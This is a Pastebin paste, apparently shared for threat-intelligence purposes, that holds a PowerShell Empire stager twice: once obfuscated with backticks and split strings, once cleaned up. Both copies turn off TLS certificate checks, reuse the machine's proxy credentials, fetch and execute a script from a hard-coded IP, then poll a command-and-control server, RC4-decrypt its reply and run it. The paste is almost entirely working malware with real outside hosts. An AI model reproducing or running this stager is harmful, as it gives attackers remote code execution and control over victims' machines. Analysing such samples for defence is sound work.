daily pastebin goal
36%
SHARE
TWEET

Powershell empire

James_inthe_box Feb 1st, 2019 378 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ${er`Ro`R`ACtI`O`NprEfe`RENCE} = ('Si'+'lently'+'Co'+'ntinu'+'e');${W`c}=NeW-ObjeCt SYsTeM.NeT.WeBClieNT;${u}=('Mozil'+'l'+'a/5.0 (Windo'+'ws NT 6.'+'1;'+' W'+'OW64;'+' Trident'+'/7'+'.'+'0; rv:11.0)'+' like Gec'+'ko');[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {${T`Rue}};${W`c}.HeaDeRS.AdD(('Us'+'er-A'+'g'+'ent'),${U});${wC}.PRoxy=[SysteM.Net.WEbREqUest]::DeFAUlTWEBPRoxy;${WC}.PROxy.CredENtiaLs = [SySTeM.Net.CreDEnTiAlCAChe]::DEfaUlTNeTWORkCREDEnTials;${scrip`T`:PRO`xy} = ${wC}.Proxy;if ([Environment]::OSVersion.Version -ge (new-object ('Vers'+'io'+'n') 10,0)) { try { IEX ${w`c}.downloadstring(('http://1'+'98'+'.50.239.63/b'+'ypfo'+'5d42.t'+'xt')) } catch { exit } }${K}=[SYstem.TexT.EncODing]::ASCII.GETBYTES(('bd2'+'69'+'87'+'7'+'36aa94'+'fd'+'628d283'+'79'+'70d08'+'ac'));${r}={${d},${k}=${A`RGS};${s}=0..255;0..255|%{${J}=(${j}+${S}[${_}]+${k}[${_}%${K}.CoUNt])%256;${s}[${_}],${s}[${j}]=${s}[${J}],${s}[${_}]};${d}|%{${i}=(${i}+1)%256;${h}=(${h}+${s}[${I}])%256;${s}[${i}],${s}[${h}]=${s}[${H}],${s}[${I}];${_}-bXOr${S}[(${s}[${i}]+${s}[${H}])%256]}};${s`eR}=('ht'+'tps'+':/'+'/185.10.68'+'.2'+'04:4'+'43');${T}=('/admin/g'+'e'+'t.php');${wC}.HEadERs.ADd(('Cooki'+'e'),('se'+'s'+'si'+'on='+'EFD'+'FfhjQ'+'5reM92KoubF'+'ojN+oN7Y='));while(-not ${d`ATA}) { ${d`ATA}=${wc}.DoWNloADDATa(${S`eR}+${T}); start-sleep 10 };${Iv}=${dA`TA}[0..3];${DA`Ta}=${DA`TA}[4..${DA`TA}.LengtH];-JOIn[ChaR[]](& ${R} ${da`TA} (${i`V}+${K}))|IEX
  2.  
  3. ${er`Ro`R`ACtI`O`NprEfe`RENCE} = ('SilentlyContinue');${W`c}=NeW-ObjeCt SYsTeM.NeT.WeBClieNT;${u}=('Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko');[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {${T`Rue}};${W`c}.HeaDeRS.AdD(('User-Agent'),${U});${wC}.PRoxy=[SysteM.Net.WEbREqUest]::DeFAUlTWEBPRoxy;${WC}.PROxy.CredENtiaLs = [SySTeM.Net.CreDEnTiAlCAChe]::DEfaUlTNeTWORkCREDEnTials;${scrip`T`:PRO`xy} = ${wC}.Proxy;if ([Environment]::OSVersion.Version -ge (new-object ('Version') 10,0)) { try { IEX ${w`c}.downloadstring(('http://198.50.239.63/bypfo5d42.txt')) } catch { exit } }${K}=[SYstem.TexT.EncODing]::ASCII.GETBYTES(('bd26987736aa94fd628d2837970d08ac'));${r}={${d},${k}=${A`RGS};${s}=0..255;0..255|%{${J}=(${j}+${S}[${_}]+${k}[${_}%${K}.CoUNt])%256;${s}[${_}],${s}[${j}]=${s}[${J}],${s}[${_}]};${d}|%{${i}=(${i}+1)%256;${h}=(${h}+${s}[${I}])%256;${s}[${i}],${s}[${h}]=${s}[${H}],${s}[${I}];${_}-bXOr${S}[(${s}[${i}]+${s}[${H}])%256]}};${s`eR}=('https://185.10.68.204:443');${T}=('/admin/get.php');${wC}.HEadERs.ADd(('Cookie'),('session=EFDFfhjQ5reM92KoubFojN+oN7Y='));while(-not ${d`ATA}) { ${d`ATA}=${wc}.DoWNloADDATa(${S`eR}+${T}); start-sleep 10 };${Iv}=${dA`TA}[0..3];${DA`Ta}=${DA`TA}[4..${DA`TA}.LengtH];-JOIn[ChaR[]](& ${R} ${da`TA} (${i`V}+${K}))|IEX
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top